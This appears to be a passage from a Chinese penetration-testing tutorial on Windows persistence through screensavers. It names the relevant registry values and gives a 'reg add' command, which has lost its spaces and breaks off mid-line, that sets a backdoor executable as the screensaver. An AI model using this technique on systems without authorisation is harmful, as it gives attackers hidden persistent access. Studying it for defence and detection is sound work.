Window权限维持（五）：屏幕保护程序.pdfVIP

屏幕保护是Windows功能的一部分，使用户可以在一段时间不活动后放置屏幕消息或图形动画。众所

周知，Windows的此功能被威胁参与者滥用为持久性方法。这是因为屏幕保护程序是具有.scr文件扩展

名的可执行文件，并通过scrnsave.scr实用程序执行。

屏幕保护程序设置存储在注册表中，从令人反感的角度来看，最有价值的值是：

HKEY_CURRENT_USER\ControlPanel\Desktop\SCRNSAVE.EXE

HKEY_CURRENT_USER\ControlPanel\Desktop\ScreenSaveActive

HKEY_CURRENT_USER\ControlPanel\Desktop\ScreenSaverIsSecure

HKEY_CURRENT_USER\ControlPanel\Desktop\ScreenSaveTimeOut

屏幕保护程序–注册表项

可以通过命令提示符或从PowerShell控制台修改或添加注册表项。由于.scr文件本质上是可执行文件，

因此两个扩展名都可以用于后门植入。

regaddhkcu\controlpanel\desktop/vSCRNSAVE.EXE/dc:\tmp\pentestlab.exe

regaddhkcu\co